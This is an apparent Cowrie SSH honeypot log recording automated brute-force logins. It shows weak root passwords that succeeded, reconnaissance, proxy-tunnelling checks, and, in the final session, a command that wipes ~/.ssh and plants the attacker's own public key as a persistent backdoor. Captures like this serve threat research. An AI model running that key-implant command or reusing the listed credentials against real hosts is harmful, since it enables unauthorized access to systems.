{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46388,"dst_ip":"1.2.3.4","dst_port":22,"session":"afc46fddd5e0","protocol":"ssh","message":"New connection: 212.227.125.160:46388 (1.2.3.4:22) [session: afc46fddd5e0]","sensor":"my-vps","timestamp":"2025-08-31T01:02:55.658170Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:55.658880Z","src_ip":"212.227.125.160","session":"afc46fddd5e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:02:55.733184Z","src_ip":"212.227.125.160","session":"afc46fddd5e0"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:02:55.966891Z","src_ip":"212.227.125.160","session":"afc46fddd5e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:02:56.288149Z","src_ip":"212.227.125.160","session":"afc46fddd5e0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:02:56.288886Z","src_ip":"212.227.125.160","session":"afc46fddd5e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:56.364666Z","src_ip":"212.227.125.160","session":"afc46fddd5e0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:56.365944Z","src_ip":"212.227.125.160","session":"afc46fddd5e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57340,"dst_ip":"1.2.3.4","dst_port":22,"session":"90119d72f833","protocol":"ssh","message":"New connection: 212.227.235.229:57340 (1.2.3.4:22) [session: 90119d72f833]","sensor":"my-vps","timestamp":"2025-08-31T01:02:57.789148Z"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":57304,"dst_ip":"1.2.3.4","dst_port":22,"session":"83c26832971b","protocol":"ssh","message":"New connection: 77.83.207.83:57304 (1.2.3.4:22) [session: 83c26832971b]","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.329914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.330600Z","src_ip":"77.83.207.83","session":"83c26832971b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.380935Z","src_ip":"77.83.207.83","session":"83c26832971b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.563735Z","src_ip":"212.227.235.229","session":"90119d72f833"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.564707Z","src_ip":"212.227.235.229","session":"90119d72f833"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.630927Z","src_ip":"77.83.207.83","session":"83c26832971b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15985,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15985","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.683115Z","session":"83c26832971b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.733536Z","src_ip":"77.83.207.83","session":"83c26832971b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20238,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:20238","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.876634Z","session":"83c26832971b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T01:02:58.927260Z","src_ip":"77.83.207.83","session":"83c26832971b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":19095,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:19095","sensor":"my-vps","timestamp":"2025-08-31T01:02:59.068576Z","session":"83c26832971b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T01:02:59.118773Z","src_ip":"77.83.207.83","session":"83c26832971b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:02:59.169651Z","src_ip":"77.83.207.83","session":"83c26832971b"}
{"eventid":"cowrie.login.failed","username":"debian","password":"admin123","message":"login attempt [debian/admin123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:03:04.815808Z","src_ip":"212.227.235.229","session":"90119d72f833"}
{"eventid":"cowrie.session.closed","duration":13.240786075592041,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:05.249227Z","src_ip":"221.124.7.211","session":"b07b010bc4f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39910,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f080681d1e0","protocol":"ssh","message":"New connection: 212.227.125.160:39910 (1.2.3.4:22) [session: 3f080681d1e0]","sensor":"my-vps","timestamp":"2025-08-31T01:03:06.037052Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:03:06.038021Z","src_ip":"212.227.125.160","session":"3f080681d1e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:03:06.111459Z","src_ip":"212.227.125.160","session":"3f080681d1e0"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:03:06.333075Z","src_ip":"212.227.125.160","session":"3f080681d1e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:03:06.669140Z","src_ip":"212.227.125.160","session":"3f080681d1e0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:03:06.669845Z","src_ip":"212.227.125.160","session":"3f080681d1e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:06.744211Z","src_ip":"212.227.125.160","session":"3f080681d1e0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:06.745333Z","src_ip":"212.227.125.160","session":"3f080681d1e0"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:06.750283Z","src_ip":"212.227.235.229","session":"90119d72f833"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44444,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8400b9725ae","protocol":"ssh","message":"New connection: 212.227.235.229:44444 (1.2.3.4:22) [session: a8400b9725ae]","sensor":"my-vps","timestamp":"2025-08-31T01:03:12.975581Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:03:12.976477Z","src_ip":"212.227.235.229","session":"a8400b9725ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:03:13.044187Z","src_ip":"212.227.235.229","session":"a8400b9725ae"}
{"eventid":"cowrie.login.failed","username":"test","password":"scricideea","message":"login attempt [test/scricideea] failed","sensor":"my-vps","timestamp":"2025-08-31T01:03:13.355358Z","src_ip":"212.227.235.229","session":"a8400b9725ae"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:14.424855Z","src_ip":"212.227.235.229","session":"a8400b9725ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45988,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f05fe117423","protocol":"ssh","message":"New connection: 212.227.235.229:45988 (1.2.3.4:22) [session: 9f05fe117423]","sensor":"my-vps","timestamp":"2025-08-31T01:03:15.596259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:03:15.603838Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:03:15.838908Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51206,"dst_ip":"1.2.3.4","dst_port":22,"session":"f78a53ae3afd","protocol":"ssh","message":"New connection: 212.227.125.160:51206 (1.2.3.4:22) [session: f78a53ae3afd]","sensor":"my-vps","timestamp":"2025-08-31T01:03:16.495396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:03:16.496040Z","src_ip":"212.227.125.160","session":"f78a53ae3afd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:03:16.569598Z","src_ip":"212.227.125.160","session":"f78a53ae3afd"}
{"eventid":"cowrie.login.success","username":"root","password":"huawei@1234","message":"login attempt [root/huawei@1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:03:16.785660Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-31T01:03:16.793199Z","src_ip":"212.227.125.160","session":"f78a53ae3afd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:03:17.275820Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:03:17.276519Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:03:17.277529Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:17.514952Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:03:17.924007Z","src_ip":"212.227.125.160","session":"f78a53ae3afd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:03:18.485314Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:03:18.486062Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:03:18.733623Z","src_ip":"212.227.235.229","session":"9f05fe117423"}
